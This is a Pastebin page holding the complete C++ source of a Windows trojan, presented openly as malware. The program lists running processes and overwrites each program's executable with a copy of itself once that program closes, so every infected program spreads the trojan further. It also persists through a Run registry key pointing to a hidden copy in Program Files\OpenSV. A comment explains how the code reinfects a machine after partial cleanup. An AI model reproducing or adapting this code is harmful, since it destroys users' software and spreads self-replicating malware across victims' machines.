Advertisement
FlyFar

C++ Trojan - "Rinse and repeat" Infection - Source Code

Mar 6th, 2023
1,259
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 6.30 KB | Cybersecurity | 0 0
  1. #include <iostream>
  2. #include <windows.h>
  3. #include <Tlhelp32.h>
  4. #include <string>
  5. #include <fstream>
  6. #include <direct.h>
  7.  
  8. std::string startupStr;
  9. std::string winDirStr;
  10. HKEY hKey;
  11. bool accessed = false;
  12.  
  13. void RegSet() { //Just add %:\Program Files\OpenSV\filehelper.exe to startup
  14.     char startup[MAX_PATH] = "";
  15.     strcat(startup, startupStr.c_str());
  16.      
  17.     HKEY hKey;
  18.     RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
  19.     RegSetValueEx(hKey, "File info", 0, REG_SZ,(const unsigned char*)startup, sizeof(startup));
  20.     RegCloseKey(hKey);
  21. }
  22.  
  23. int TargetList() {
  24.     HMODULE GetModH = GetModuleHandle(NULL);
  25.     char self[MAX_PATH];                           //  }___Create char self and then apply the THIS .exe's path and name to it.
  26.     GetModuleFileName(GetModH, self, sizeof(self));//  }
  27.      
  28.     std::ifstream TarListIn;
  29.     std::ifstream exeCheck;
  30.     std::string targetPath;
  31.     TarListIn.open(winDirStr.c_str(), std::ios::in);
  32.     exeCheck.open(startupStr.c_str(), std::ios::in | std::ios::binary);
  33.     std::getline (TarListIn, targetPath);
  34.     //std::cout << "\"" << path << "\"" << std::endl;
  35.     //std::cin.get();
  36.     if(TarListIn.is_open() && exeCheck.is_open()) { //If files.txt AND filehelper.exe (.exe list and infection .exe) exist, continue.
  37.         while(!TarListIn.eof()) { //While we havent reached the end of the list, do..... *.eof also advances the current line being read in the txt file.
  38.             if(accessed) {  //If GenerateList declares files.txt as being accessed, hold off for 100 ms (to avoid high cpu usage) and then re-run TargetList
  39.                 Sleep(100);
  40.                 TargetList();
  41.                 return 0; //We dont want it to run twice+, do we?
  42.             }
  43.             std::getline (TarListIn, targetPath); //Each running .exe's path is put in its own line. Read the current line, and....
  44.             CopyFile(self, targetPath.c_str(), false); //...copy it from self (current running infection file) to targetPath, overwriting it.
  45.             Sleep(50); //Why not?
  46.             //DeleteFile(path.c_str());
  47.         }
  48.         TarListIn.close(); //Close files.txt
  49.     } else { //NOW, if either files.txt OR filehelper.exe were not found, lets RECOPY THEM =D
  50.         CopyFile(self, startupStr.c_str(), false);
  51.         RegSet(); //Add %:\Program Files\OpenSV\filehelper.exe to startup, for "startup rinsing"
  52.         Sleep(100); //A good 100ms never hurts
  53.     }
  54.      
  55. }
  56.  
  57. DWORD WINAPI GenerateList(LPVOID) {
  58.     while(true) {
  59.         std::ofstream TarListOut;
  60.         std::string filePath;
  61.         PROCESSENTRY32 sEntry;
  62.         MODULEENTRY32 mEntry;
  63.         HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //Gets snapshot of running processes
  64.         HANDLE ModSnap;
  65.         std::string path;
  66.      
  67.         sEntry.dwSize = sizeof(PROCESSENTRY32);
  68.         mEntry.dwSize = sizeof(MODULEENTRY32);
  69.         ModSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, sEntry.th32ProcessID);
  70.         Module32First(ModSnap, &mEntry);
  71.          
  72.         RegSet();
  73.         accessed = true; //TargetList() checks this value, when true (.txt being written to) it will not try to read from the file
  74.         TarListOut.open(winDirStr.c_str(), std::ios::out);    
  75.         while(Process32Next(snapshot, &sEntry)){    //One by one, add the path of the .exe to the text file, and proceed to the next running .exe
  76.             ModSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, sEntry.th32ProcessID); //Assigns snapshot to ModSnap
  77.             Module32Next(ModSnap, &mEntry); //Move to next item in list
  78.             filePath = mEntry.szExePath; //Put .exe into file path
  79.             if(filePath.find("\\") < MAX_PATH) { //Most system .exe's lack the full path, only displaying .exe name. We cant overwrite these easily anyway, so...
  80.                 TarListOut << filePath << std::endl; //Writes [path].exe to TarListOut, which is files.txt                     ...we filter out names that lack a "\"
  81.             }
  82.         }
  83.         TarListOut.close(); //Close .txt file
  84.         accessed = false; //Allow TargetList() to continue reading from the .txt file
  85.         Sleep(10000);
  86.     }
  87. }
  88.  
  89. void config() {
  90.     startupStr = _getdrive() + 0x40; //Find windows install drive, set it to startupStr
  91.     startupStr = startupStr + ":\\Program Files\\OpenSV\\"; //Add infection "install" directory to the drive letter
  92.     if(GetFileAttributes(startupStr.c_str()) == INVALID_FILE_ATTRIBUTES)   //If non-existent,
  93.         CreateDirectory(startupStr.c_str(), NULL);                         //    create the directory
  94.     winDirStr = startupStr + "files.txt";       //.txt file listing running .exes
  95.     startupStr += "filehelper.exe"; //Ran at startup for easy rinsing, central location that is less likely to be found or deleted.
  96.     //MessageBox(NULL, startupStr.c_str(), winDirStr.c_str(), MB_OK);
  97.  
  98.     RegSet();
  99. }
  100.  
  101. //Summary
  102.     /*While GenerateList is fetching a list of running .exe's every ten seconds, TargetList attempts to overwrite each .exe found, repeating every one second.
  103.         At first nothing will happen, a running .exe cannot be overwritten. When that .exe is closed, the "rinse and repeat" cycle "rinses" each non-running
  104.         .exe, by overwriting it. Next time the user runs that program, it is merely a duplicate of the infection, and will spread further. A copy of the infection
  105.         located in %:\Program Files\OpenSV\ starts on startup, with the list of previosly-running .exes remaining in a .txt file. At a fresh start, most of the programs
  106.         in that list wont be running, so the infection will spread to many programs at that point. It is also recopied and re-entered to the registry every time any
  107.         instance of the infection is run. Even after successful removal, the infection can start all over if the user forgot to disinfect a single .exe somewhere, and runs it.*/
  108.      
  109.  
  110. int main() {
  111.     config(); //initialize the infection
  112.     CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&GenerateList, 0, 0, NULL); //Begin running .exe finding. Refreshes list every 10 seconds.
  113.     while(true) {
  114.         TargetList(); //Overwrite all exe's found with GenerateList thread. "rinse and repeat"
  115.         Sleep(1000);                                //1 second(s)
  116.     }
  117.      
  118.     return 0;
  119.  
  120. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement